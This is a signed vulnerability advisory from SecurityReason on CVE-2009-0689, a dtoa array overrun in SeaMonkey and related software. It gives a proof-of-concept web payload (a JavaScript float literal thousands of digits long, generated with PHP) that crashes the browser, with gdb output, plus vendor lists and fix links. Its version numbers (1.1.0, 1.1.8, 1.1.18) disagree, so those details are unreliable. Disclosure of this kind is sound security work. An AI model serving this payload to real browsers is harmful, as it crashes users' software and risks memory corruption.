SeaMonkey 1.1.0 Remote Array Overrun

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]  
  
Author: Maksymilian Arciemowicz and sp3x  
http://SecurityReason.com  
Date:  
- - Dis.: 07.05.2009  
- - Pub.: 20.11.2009  
  
CVE: CVE-2009-0689  
Risk: High  
Remote: Yes  
  
Affected Software:  
- - SeaMonkey 1.1.18  
  
Fixed in:  
- - SeaMonkey 2.0  
  
NOTE: Prior versions may also be affected.  
  
Original URL:  
http://securityreason.com/achievement_securityalert/71  
  
  
- --- 0.Description ---  
The SeaMonkey project is a community effort to develop the SeaMonkey  
all-in-one internet application suite (see below). Such a software suite  
was previously made popular by Netscape and Mozilla, and the SeaMonkey  
project continues to develop and deliver high-quality updates to this  
concept. Containing an Internet browser, email & newsgroup client with  
an included web feed reader, HTML editor, IRC chat and web development  
tools, SeaMonkey is sure to appeal to advanced users, web developers and  
corporate users.  
  
  
- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code  
execution) ---  
The main problem exist in dtoa implementation. SeaMonkey has the same  
dtoa as a KDE, Opera and all BSD systems. This issue has been fixed in  
Firefox 3.5.4 and fix  
  
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42  
  
has been used to patch SeaMonkey 2.0.  
  
This flaw has been detected in may 2009 and signed SREASONRES:20090625.  
  
http://securityreason.com/achievement_securityalert/63  
  
but fix for SREASONRES:20090625, used by openbsd was not good.  
More information about fix for openbsd and similars SREASONRES:20091030,  
  
http://securityreason.com/achievement_securityalert/69  
  
We can create any number of float, which will overwrite the memory. In  
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it  
is possible to call 16<= elements of freelist array.  
  
  
- --- 2. Proof of Concept (PoC) ---  
  
- -----------------------  
<script>  
var a=0.<?php echo str_repeat("9",299999); ?>;  
</script>  
- -----------------------  
  
If we use SeaMonkey to see this PoC, SeaMonkey will crash. For example  
  
- -----------------------  
<script>  
var a=0.<?php echo str_repeat("1",296450); ?>;  
</script>  
- -----------------------  
  
127# gdb seamonkey-bin seamonkey-bin.core  
...  
#0 0x28df0ecb in ?? ()  
...  
(gdb) i r  
eax 0x0 0  
ecx 0x2 2  
edx 0xbfbfd2fc -1077947652  
ebx 0x28da9b6c 685415276  
esp 0xbfbfd2ac 0xbfbfd2ac  
ebp 0xbfbfd2c8 0xbfbfd2c8  
esi 0xb 11  
edi 0xb 11  
eip 0x28df0ecb 0x28df0ecb  
...  
  
esi = esi = 11  
  
  
- --- 3. SecurityReason Note ---  
  
Officialy SREASONRES:20090625 has been detected in:  
- - OpenBSD  
- - NetBSD  
- - FreeBSD  
- - MacOSX  
- - Google Chrome  
- - Mozilla Firefox  
- - Mozilla Seamonkey  
- - KDE (example: konqueror)  
- - Opera  
- - K-Meleon  
  
This list is not yet closed. US-CERT declared that will inform all  
vendors about this issue, however, they did not do it. Even greater  
confusion caused new CVE number "CVE-2009-1563". Secunia has informed  
that this vulnerability was only detected in Mozilla Firefox, but nobody  
was aware that the problem affects other products like ( KDE, Chrome )  
and it is based on "CVE-2009-0689". After some time Mozilla Foundation  
Security Advisory  
("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html")  
was updated with note :  
"The underlying flaw in the dtoa routines used by Mozilla appears to be  
essentially the same as that reported against the libc gdtoa routine by  
Maksymilian Arciemowicz ( CVE-2009-0689)".  
This fact ( new CVE number for Firefox Vulnerability )and PoC in  
javascript (from Secunia), forced us to official notification all other  
vendors. We publish all the individual advisories, to formally show all  
vulnerable software and to avoid wrong CVE number. We do not see any  
other way to fix this issue in all products.  
  
Please note:  
Patch used in Firefox 3.5.4 does not fully solve the problem. Dtoa  
algorithm is not optimal and allows remote Denial of Service in Firefox  
3.5.5 giving long float number.  
  
  
- --- 4. Fix ---  
NetBSD fix (optimal):  
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h  
  
OpenBSD fix:  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c  
  
  
- --- 5. Credits ---  
Discovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.  
  
  
- --- 6. Greets ---  
Infospec p_e_a pi3  
  
  
- --- 7. Contact ---  
Email:  
- - cxib {a.t] securityreason [d0t} com  
- - sp3x {a.t] securityreason [d0t} com  
  
GPG:  
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
- - http://securityreason.com/key/sp3x.gpg  
  
http://securityreason.com/  
http://securityreason.pl/  
-----BEGIN PGP SIGNATURE-----  
  
iEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D  
ZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB  
=JY6k  
-----END PGP SIGNATURE-----  
  
`